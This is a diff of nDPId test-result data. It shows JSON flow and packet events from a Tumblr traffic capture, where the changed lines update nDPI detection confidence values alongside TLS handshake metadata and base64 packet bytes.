00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605292108746,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108746,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3wyDoZi2igBBBsd06AAABAQgKqXtZHsLc+wU="} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2778,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -90,8 +90,8 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2839,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605292108895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292108895,"pkt":"qtsDr8lk5EKm5WPyht1gCOgvACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3goBu3qld1IAAAAAoAL9IHkiAAACBAWgBAIICgXJqEYAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2848,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605292108917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292108917,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAMAATQMqAcsBIEmLB5kd7IUo3\/YpAbveCh3iVUV6pXdToBJXgDxxAAACBAV4AQMDAwQCCArC3axnBcmoRg=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2849,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605292108917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108917,"pkt":"qtsDr8lk5EKm5WPyht1gCOgvACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3goBu3qld1Md4lVGgBAB+8BsAAABAQgKBcmoXMLdrGc="} 
-00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2850,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292108895,"flow_last_seen":1605292108918,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292108918,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2953,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292108895,"flow_last_seen":1605292108973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292108973,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2850,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292108895,"flow_last_seen":1605292108918,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292108918,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2953,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292108895,"flow_last_seen":1605292108973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292108973,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12579,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292114506,"flow_last_seen":1605292114506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292114506,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12579,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605292114506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292114506,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iknWH70O\/fgBATex8tAAABAQgKqXtvnsLdEcs="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12580,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605292114736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292114736,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvQ79+YpJ1igBBY1dkNAAABAQgKwt3C3al6v1A="} 
@@ -156,41 +156,41 @@ 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23415,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1605292121486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292121486,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+osAAAAAoAL9IJMMAAACBAWgBAIICpi1TMUAAAAAAQMDBw=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23416,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605292121507,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292121507,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAEpymhYqAcsBIEmLB5kd7IUo3\/YpAbupQGb5NYUDXPqMoBJXgPvWAAACBAV4AQMDAwQCCArC3d2UmLVMxQ=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23417,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605292121507,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121507,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+oxm+TWGgBAB+3\/SAAABAQgKmLVM28Ld3ZQ="} 
-00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23418,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292121486,"flow_last_seen":1605292121507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292121507,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23418,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292121486,"flow_last_seen":1605292121507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292121507,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292121674,"flow_last_seen":1605292121674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292121674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605292121674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121674,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v36ZlfzugBAB9Zh5AAABAQgKG7m2dMLdLYw="} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23421,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292121486,"flow_last_seen":1605292121697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292121697,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01286{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23427,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605292121486,"flow_last_seen":1605292121698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1605292121698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","server_names":"*.tumblr.com,tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tumblr.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"14:78:BA:5B:B5:54:5D:A1:2C:D2:79:4C:42:99:BB:3A:A9:DB:86:C2"}} 
+01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23421,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292121486,"flow_last_seen":1605292121697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292121697,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01286{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23427,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605292121486,"flow_last_seen":1605292121698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1605292121698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","server_names":"*.tumblr.com,tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tumblr.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"14:78:BA:5B:B5:54:5D:A1:2C:D2:79:4C:42:99:BB:3A:A9:DB:86:C2"}} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605292121698,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121698,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgXAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbvZCJmV\/O79d79\/gBALlo7gAAABAQgKwt3eUxu5BaQ="} 00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122064,"flow_last_seen":1605292122064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605292122064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122064,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGkAAAAAoAL9IOE8AAACBAWgBAIICthbOh0AAAAAAQMDBw=="} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23633,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605292122076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":172,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":172,"pkt_l4_len":118,"thread_ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAHYGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2Qd9sejoTgBgk6QsuAAABAQgKJEeQFMLc4vQXAwMAUQAAAAAAAAAPN+72C7wfHoQtmaJB3aOHKjPk6JlEWLNjF5TOq7HiJ1O2KSnCxtEIEQAeO4GmbeSTOkkpawAah7BKsajx09L6L57ZkTTcEWLCJA=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23633,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102602,"flow_last_seen":1605292122076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":1,"thread_ts_msec":1605292122076,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23633,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102602,"flow_last_seen":1605292122076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":1,"thread_ts_msec":1605292122076,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23634,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605292122076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAE4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2QjVsejoTgBgk6YPXAAABAQgKJEeQFMLc4vQXAwMAKQAAAAAAAAAQ4G\/3mQ3kGgQra1eBqPYCTvM1QPmaUoG2gBnwdZPdmFLU"} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23650,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605292122094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122094,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgJAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvBjCTTL5FAHmhqoBJXgI\/cAAACBAV4AQMDAwQCCArC3d\/Z2Fs6HQ=="} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23654,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605292122094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122094,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGok0y+SgBAB+xPQAAABAQgK2Fs6O8Ld39k="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122064,"flow_last_seen":1605292122094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122094,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122064,"flow_last_seen":1605292122094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122094,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 